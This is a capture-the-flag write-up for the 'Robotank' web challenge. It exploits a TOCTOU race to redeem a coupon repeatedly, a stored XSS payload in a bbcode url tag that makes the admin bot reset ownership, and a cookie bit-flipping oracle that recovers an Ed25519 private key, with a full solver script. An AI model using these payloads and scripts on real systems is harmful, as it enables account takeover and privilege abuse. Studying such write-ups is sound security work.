Robotank
1 file available
Description
This is a cyberwar.
Every cyberwar has its robotank.
This is our robotank.
Get your credentials here
- You are allowed to only have one account. Creating multiple CTFd accounts is prohibited and will result in a ban.
- The challenge controls a physical robot. Every attempt to damage it or anything in the physical world will be harshly punished.
- Do not try to move out of the arena we built.
- Hacking the robot is not part of the challenge. The scope of the challenge is limited to the web application only.
Analysis
This challenge involves multiple exploitation techniques across different parts of the web application.
Increase balance
The application presents a coupon, given to us at the login.
The coupon is generated at the register or reset of the account, and we consider it pretty safe since it is a uuid-v4
. It allows us to redeem 5
unit of balance, which can be used to buy the actions that we want to execute.
The code that applies it is the following:
router.post(
"/:id/coupon",
body("coupon").notEmpty().isString(),
async (req, res) => {
const data = validate(req, res);
if (!data) {
return;
}
const accountID = parseInt(req.params.id);
if (
isNaN(accountID) ||
+req.session.user.id !== accountID ||
req.session.user.username === process.env.ADMIN_USERNAME
) {
res.redirect(`/account/${req.session.user.id}`);
return;
}
const requested_coupon = data.coupon;
if (!isUuid(requested_coupon)) {
res.status(403).json({
result: "failure",
message: "Invalid coupon",
});
return;
}
const { coupon } = await db.fetchUserById(req.session.user.id);
try {
if (requested_coupon === coupon) {
await db.applyCoupon(req.session.user.id);
res.json({
result: "success",
redirect: `/account/${req.session.user.id}`,
});
res.end();
return;
}
} catch (error) {
console.log(error);
}
res.status(403).json({
result: "failure",
message: "Invalid coupon",
});
}
);
We can see that the coupon is vulnerable to a vulnerability class called TOCTOU, since the fetch, check and application are not made in a single transaction!
We can then use grequests
to apply it multiple times.
Action Reset
By looking at the views we can see there's an admin page:
extends layout
block content
div(class="admin-item-panel")
each item in items
.item-view
p= item.name
p Owner: #{item.username}
button(onclick=`resetOwnership(${item.id})`) Reset
script(src="/js/admin.js")
The resetOwnership
function is defined in the admin.js
file:
const resetOwnership = (action_id) => {
$.ajax({
type: "POST",
url: "/admin",
contentType: "application/json",
data: JSON.stringify({
id: action_id,
}),
success: (data) => {
// Handle the response from the server
if (data.redirect) window.location.pathname = data.redirect;
if (data.message) window.messagebox.innerText = data.message;
},
error: (error) => {
console.error("Error:", error);
},
});
};
The code to reset the owner is protected by the requireAdmin
middleware:
requireAdmin: (req, res, next) => {
if (req.session.user.username === process.env.ADMIN_USERNAME) {
return next();
} else {
res.redirect("/");
}
}
....
router.post("/", body("id").notEmpty(), (req, res) => {
const data = validate(req, res);
if (!data) {
return;
}
action_id = parseInt(data.id);
if (isNaN(action_id)) {
res.json({
result: "failure",
});
return;
}
db.resetItemOwner(action_id).then((success) => {
if (success) {
res.json({
result: "success",
redirect: "/admin",
});
} else {
res.json({
result: "failure",
redirect: "/admin",
});
}
});
});
We notice that the application runs a bot which logs in and check the reports.
The code of the bot is available at /src/utils/report.js
, it basically log in and visit the URL.
We can report via the endpoint /report
(POST) or in the error page, and the admin will visit our url (if it is in the web page, checked via BOT_SANITY_REGEX
).
This means that only the admin can reset the owner of an action and it must be in the website. How can we perform an XSS?
By checking our account page we notice that we can set a motto for the team, and it supports a little of bbcode.
The parser is in the file bbrender.js
:
$(document).ready(() => {
if (window.current_motto) {
var current_motto = window.current_motto.innerText;
if (current_motto.includes("<") || current_motto.includes(">")) return; // Welcome back to my laboratory, where safety is number one priority
current_motto = current_motto.replace(/\[b\]/, "<strong>");
current_motto = current_motto.replace(/\[\/b\]/, "</strong>");
current_motto = current_motto.replace(/\[i\]/, "<i>");
current_motto = current_motto.replace(/\[\/i\]/, "</i>");
current_motto = current_motto.replace(/\[url ([^\]\ ]*)\]/, "<a href=$1>");
current_motto = current_motto.replace(/(.*)\[\/url\]/, "$1</a>");
// Images are so dangerous
// current_motto = current_motto.replace(/\[img\]/, '<img src="');
// current_motto = current_motto.replace(/\[\/img\]/, '" />');
window.current_motto.innerHTML = current_motto;
}
});
We notice that images tag are not parsed, but URLs are! We can focus on the line current_motto = current_motto.replace(/\[url ([^\]\ ]*)\]/, "<a href=$1>")
: this regex is way too permissive, since the only constraint we have is that there's no ]
or whitespace in our payload!
In fact, we can insert the double quote to close the href
attribute of the link and execute javascript with events like onfocus
, triggered via autofocus
.
With this XSS we can reset an action owner!
An example payload can be [url ""onfocus="fetch('/admin',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({id:1})})"autofocus]
to reset the action with ID 1.
Account reset
Analysis
In the account
page, the service gives us:
- the generator of the group of the elliptic curve
- the public key (a point on the curve)
P = (x,y)
- a
challenge
to sign in order to create the correct token
By analyzing the source code we can discover that:
- the chosen elliptic curve is
ED25519
. - the given generator
G
is the common generator. - the service stores a cookie named
secret
which is the encrypted private key. - the private key is encrypted with a session key, which is unique for each account.
- the encrypted secret in the cookie is the
XOR
between the private key and the session key.
Summarizing:
aG = P
secret = a XOR sess
Getting the session key
The first thing to do is obtaining the session key. We can notice, from the source code, that the account page uses the supplied cookie to compute the corresponding private key (by decryption). Then, it uses the computed private key to get the corresponding public key by multiplying it with the curve generator.
What happens when the cookie is set to 0
?
0 = a XOR sess
a = 0 XOR sess
a = sess
The private key becomes the session key.
From this point, we will use a counter
i
. It starts from0
.
Now, what happens when we set to 1
only the i_th
bit of the cookie?
00000...00010000...000 = a XOR sess
a = 00000...00010000...000 XOR sess
The private key becomes the session key except for one bit which is changed from 0
to 1
or viceversa.
Good! But... what happend to their corresponding public key?
The last equation can follow two directions:
- If the
i_th
bit of the session key was0
, it would become1
, then the last equation could be rewritten as: - If the
i_th
bit of the session key was1
, it would become0
, then the last equation could be rewritten as follow:
Algorithm:
- Save the public key corresponding to the session key (obtained by setting the cookie to
0
). We call itREF_public_key
. - For
i
in0..256
we can compute the public key obtained by setting thei_th
bit of the cookie to1
and the others to0
. We call itanalyzed_public_key
.- If
analyzed_public_key == REF_public_key + 2^i
then thei_th
bit of the session key was0
1
otherwise
- If
By doing so, we can obtain the corresponding session key
.
Getting the private key
If we saved the original encrypted private key (the original cookie), we can obtain the private key by computing the XOR
between the saved cookie and the session key we got in the previous step.
Signing the challenge
By having the private key, we can easily sign the given challenge
to obtain the token and reset the account.
Important: if you are doing that in python, please use the following package to sign the challenge:
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
Solver
Implementation Code
Instead of using a common ED25519
library, you can use the following simple implementation (Credits to RedRocket):
import hashlib
def input_to_element(func):
def cast_wrapper(self, arg, *args, **kwargs):
if isinstance(arg, int):
arg = FieldElement(self.field, arg)
elif not isinstance(arg, FieldElement):
raise ValueError("Can't cast type {} to FieldElement.".format(arg))
elif self.field != arg.field:
raise ValueError("Elements are in different fields!")
return func(self, arg)
return cast_wrapper
class PrimeField:
def __init__(self, mod):
self.mod = mod
def __call__(self, *args, **kwargs):
return FieldElement(self, args[0])
def add(self, a, b):
"""
Add two numbers in the field and return the reduced field element.
"""
return a + b % self.mod
def sub(self, a, b):
"""
Subtract two numbers in the field and return the reduced field element.
"""
return a - b % self.mod
def mul(self, a, b):
"""
Multiply two numbers in the field and return the reduced field element.
"""
return a * b % self.mod
def div(self, a, b):
"""
Divide a by b
"""
inverse = self.pow(b, -1)
return a * inverse % self.mod
def equiv(self, a, b):
"""
Check if two numbers are equivalent in the field.
"""
return a % self.mod == b % self.mod
def pow(self, base, exponent):
"""
Calculate the exponentiation base**exponent within the field.
Uses square and multiply.
"""
if isinstance(exponent, FieldElement):
exponent = exponent.elem
if not isinstance(exponent, int):
raise ValueError("Only integers allowed as exponents.")
# Work modulo the group order
exponent %= (self.mod - 1)
# Implement Square and Multiply?
return pow(base, exponent, self.mod)
def reduce(self, a):
"""
Return the smallest representative of number a within the field.
"""
return a % self.mod
def __str__(self):
return f"F_{self.mod}"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
if not isinstance(other, PrimeField):
return False
return self.mod == other.mod
class FieldElement:
def __init__(self, field, elem):
if isinstance(elem, FieldElement):
elem = elem.elem
self.field = field
self.elem = self.field.reduce(elem)
@input_to_element
def __add__(self, other):
return FieldElement(
self.field,
self.field.add(self.elem, other.elem)
)
def __radd__(self, other):
return self.__add__(other)
@input_to_element
def __sub__(self, other):
return FieldElement(
self.field,
self.field.sub(self.elem, other.elem)
)
@input_to_element
def __rsub__(self, other):
return FieldElement(
self.field,
self.field.sub(other.elem, self.elem)
)
def __mul__(self, other):
if isinstance(other, int):
other = FieldElement(self.field, other)
elif not isinstance(other, FieldElement):
# Maybe the "other" has a working __rmul__ implementation
return other.__rmul__(self.elem)
return FieldElement(
self.field,
self.field.mul(self.elem, other.elem)
)
@input_to_element
def __truediv__(self, other):
return FieldElement(
self.field,
self.field.div(self.elem, other.elem)
)
def __rmul__(self, other):
return self.__mul__(other)
def __eq__(self, other):
if isinstance(other, int):
other = self.field(other)
elif not isinstance(other, FieldElement):
return False
return self.field == other.field and self.field.equiv(self.elem, other.elem)
def __pow__(self, power, modulo=None):
return FieldElement(
self.field,
self.field.pow(self.elem, power)
)
def to_bytes(self, lenght, byteorder):
return self.elem.to_bytes(lenght, byteorder)
def __str__(self):
return f"{self.elem}"
def __repr__(self):
return self.__str__()
class AffinePoint:
def __init__(self, curve, x, y, order=None):
self.curve = curve
if isinstance(x, int) and isinstance(y, int):
self.x = curve.field(x)
self.y = curve.field(y)
else: # for POIF and field elements
self.x = x
self.y = y
self.order = order
def __add__(self, other):
return self.curve.add(self, other)
def __iadd__(self, other):
return self.__add__(other)
def __rmul__(self, scalar):
return self.curve.mul(self, scalar)
def __str__(self):
return "Point({},{}) on {}".format(self.x, self.y, self.curve)
def copy(self):
return AffinePoint(self.curve, self.x, self.y)
def __eq__(self, other):
if not isinstance(other, AffinePoint):
raise ValueError("Can't compare Point to {}".format(type(other)))
if hasattr(self.curve, "poif") and self is self.curve.poif:
if other is self.curve.poif:
return True
return False
return self.curve == other.curve and self.x == other.x and self.y == other.y
class EllipticCurve:
def invert(self, point):
"""
Invert a point.
"""
return AffinePoint(self, point.x, (-1 * point.y))
def mul(self, point, scalar):
"""
Do scalar multiplication Q = dP using double and add.
"""
if isinstance(scalar, FieldElement):
scalar = scalar.elem
return self.double_and_add(point, scalar)
def double_and_add(self, point, scalar):
"""
Do scalar multiplication Q = dP using double and add.
As here: https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Double-and-add
"""
if scalar < 1:
raise ValueError("Scalar must be >= 1")
result = None
tmp = point.copy()
while scalar:
if scalar & 1:
if result is None:
result = tmp
else:
result = self.add(result, tmp)
scalar >>= 1
tmp = self.add(tmp, tmp)
return result
class EdwardsCurve(EllipticCurve):
def __init__(self, d, field, a=1):
"""
General Edwards Curve.
If a!=1, the curve is twisted.
"""
self.field = field
self.d = field(d)
self.a = field(a)
# By definition, so we can do the addition as below
self.neutral_element = AffinePoint(self, 0, 1)
def is_on_curve(self, P):
x_sq = P.x**2
y_sq = P.y**2
return (self.a * x_sq + y_sq) == (1 + self.d * x_sq * y_sq)
def add(self, P, Q):
"""
Sum of points P and Q.
https://en.wikipedia.org/wiki/Edwards_curve#The_group_law
"""
if not (self.is_on_curve(P) and self.is_on_curve(Q)):
raise ValueError("Points not on curve")
den_x = 1 + (self.d * P.x * P.y * Q.x * Q.y)
den_y = 1 - (self.d * P.x * P.y * Q.x * Q.y)
nom_x = P.x * Q.y + Q.x * P.y
nom_y = P.y * Q.y - self.a * Q.x * P.x
return AffinePoint(
self,
nom_x * den_x**-1,
nom_y * den_y**-1
)
def __str__(self):
return "{}x^2 + y^2 = 1 + {}x^2y^2 mod {}".format(self.a, self.d, self.field.mod)
FIELD = PrimeField(2 ** 255 - 19)
CURVE = EdwardsCurve(37095705934669439343138083508754565189542113879843219016388785533085940283555, FIELD, -1)
B = AffinePoint(CURVE,
15112221349535400772501151409588531511454012693041857206046113283949847762202,
46316835694926478169428394003475163141307993866256225615783033603165251855960,
2 ** 252 + 27742317777372353535851937790883648493)
b = 256
n = 254
def calculate_secret_scalar(sk):
h = bytearray(hashlib.sha512(sk).digest()[:32])
h[0] &= 248
h[31] &= 127
h[31] |= 64
return int.from_bytes(h, 'little')
def encode_point(P):
y = P.y.elem
x = P.x.elem
if x & 1:
y |= 1 << (32 * 8 - 1)
else:
y &= ~(1 << (32 * 8 - 1))
return y.to_bytes(32, 'little')
def decode_point(P):
y = FIELD(int.from_bytes(P, 'little') & ~(1 << (32 * 8 - 1)))
u = y ** 2 - 1
v = CURVE.d * y ** 2 + 1
x = (u * v ** -1) ** ((FIELD.mod+3) * FIELD(8) ** -1)
if v * x ** 2 == u * -1:
x = x * FIELD(2) ** ((FIELD.mod-1) * FIELD(4) ** -1).elem
elif v * x ** 2 != u:
raise ValueError("Point can't be decoded")
x_0 = (int.from_bytes(P, 'little') & 1 << (32 * 8 - 1)) >> (32 * 8 - 1)
if x == 0 and x_0 == 1:
raise ValueError("Point can't be decoded")
if x_0 != x.elem % 2:
x = x * -1
return AffinePoint(CURVE, x, y)
def hash_digest(input_bytes):
return hashlib.sha512(input_bytes).digest()
def bytes_to_int(input_bytes):
return int.from_bytes(input_bytes, "little")
def int_from_hash(input_bytes):
return bytes_to_int(
hash_digest(input_bytes)
)
class ED25519PublicKey:
def __init__(self, pk_bytes):
self.pk_bytes = pk_bytes
self.pk = decode_point(pk_bytes)
def verify(self, message, signature):
R = decode_point(signature[:32])
S = bytes_to_int(signature[32:])
k = int_from_hash(signature[:32] + self.pk_bytes + message)
return S * B == R + k * self.pk
class ED25519PrivateKey:
def __init__(self, sk):
if not (isinstance(sk, bytes) and len(sk) == 32):
raise ValueError("Only 32B byte strings allowed as secret key.")
self.sk_raw = sk
self.sk = calculate_secret_scalar(sk)
def public_key(self):
pk_encoded = encode_point(self.sk * B)
public_key = ED25519PublicKey(pk_encoded)
return public_key
def sign(self, message):
prefix = hash_digest(self.sk_raw)[32:]
r = int_from_hash(prefix + message)
r = 1
R = encode_point(r * B)
k = int_from_hash(R + self.public_key().pk_bytes + message)
S = (r + (k % B.order) * self.sk) % B.order
return R + S.to_bytes(32, 'little')
def serialize(self):
return self.sk.to_bytes(32, "big")
def unserialze(from_bytes):
privkey = ED25519PrivateKey(b"mock" * 8)
privkey.sk = int.from_bytes(from_bytes)
return privkey
Main Exploit
from signature import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
import random
from bs4 import BeautifulSoup
import requests
from pwn import *
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
SCHEMA = args.SCHEMA if args.SCHEMA else "https"
VERIFY_CERTIFICATE = args.VERIFY == "True" if args.VERIFY else True
HOST = args.HOST if args.HOST else "localhost"
PORT = args.PORT if args.PORT else 3000
BASE_URL = f"{SCHEMA}://{HOST}:{PORT}"
USER = args.USER if args.USER else "admin"
PASSWORD = args.PASSWORD if args.PASSWORD else "REDACTED"
LINK_REGISTER = "/auth/register"
LINK_LOGIN = "/auth/login"
LINK_ACCOUNT = ""
payload = {"username": USER, "password": PASSWORD}
headers = {"sec-ch-ua": "\"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"", "Accept": "*/*", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36", "sec-ch-ua-platform": "\"Linux\"", "Origin": "http://localhost:3000", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost:3000/account/2", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
def get_public_key_from_cookie(s, cookie):
s.cookies.pop('secret', None)
s.cookies["secret"]= cookie
r = s.get(f"{BASE_URL}{LINK_ACCOUNT}", verify=VERIFY_CERTIFICATE)
soup = BeautifulSoup(r.text, "html.parser")
try:
container = soup.findAll("div", {"class": "card-body"})[1].findAll("p")
except:
print(r.text)
exit(1)
public_key = [int(c) for c in container[0].text[11:].split(",")]
return public_key
def byte_xor(ba1, ba2):
return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])
s = requests.Session()
r = s.get(f"{BASE_URL}", verify=VERIFY_CERTIFICATE)
r = s.post(f"{BASE_URL}{LINK_LOGIN}", json=payload, headers=headers, verify=VERIFY_CERTIFICATE)
res = s.get(f"{BASE_URL}", verify = VERIFY_CERTIFICATE)
soup = BeautifulSoup(res.text, "html.parser")
LINK_ACCOUNT = soup.findAll("a", {"class": "nav-link"})[0]["href"]
r = s.get(f"{BASE_URL}{LINK_ACCOUNT}", verify = VERIFY_CERTIFICATE)
# getting original data
soup = BeautifulSoup(r.text, "html.parser")
container = soup.findAll("div", {"class": "card-body"})[1].findAll("p")
public_key = [int(c) for c in container[0].text[11:].split(",")]
generator = int(container[1].text[14:])
challenge = int(container[2].text[20:])
encrypted_secret_key = bytes.fromhex(s.cookies["secret"])
print(f'Challenge: {challenge}')
G = AffinePoint(CURVE,
15112221349535400772501151409588531511454012693041857206046113283949847762202,
46316835694926478169428394003475163141307993866256225615783033603165251855960)
PK = AffinePoint(CURVE,
public_key[0],
public_key[1])
aes_ctr_key = []
# riferimento PKZeros
public_key_zeros = get_public_key_from_cookie(s, "0"*64)
PK0 = AffinePoint(CURVE,
public_key_zeros[0],
public_key_zeros[1]
)
# procedure to find the key
for i in range(1, 257):
cookie = hex(int("0"*(256-i)+"1"+"0"*(i-1),2))[2:].zfill(64)
public_key_temp = get_public_key_from_cookie(s, cookie)
PK_temp = AffinePoint(CURVE,
public_key_temp[0],
public_key_temp[1]
)
if PK_temp == PK0 + (1<<(i-1))*G:
aes_ctr_key.append(0)
else:
aes_ctr_key.append(1)
time.sleep(0.05)
key = ("".join([str(x) for x in aes_ctr_key[::-1]]))
decrypted_private_key = byte_xor(bytes.fromhex(hex(int(key, 2))[2:].zfill(64)),bytes.fromhex(encrypted_secret_key.hex()))
priv_key = bytes_to_long(decrypted_private_key)
print(f"The session key: {hex(int(key, 2))[2:].zfill(64)}")
assert priv_key*G == PK
hex_private_key = hex(priv_key)[2:].zfill(64)
print(f'Private key: {hex(priv_key)[2:].zfill(64)}')
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
private = Ed25519PrivateKey.from_private_bytes(bytes.fromhex(hex_private_key))
token = private.sign(long_to_bytes(challenge)).hex()
res = s.post(f"{BASE_URL}{LINK_ACCOUNT}/token", json={"token":token}, headers=headers, verify=VERIFY_CERTIFICATE)
print(res.text)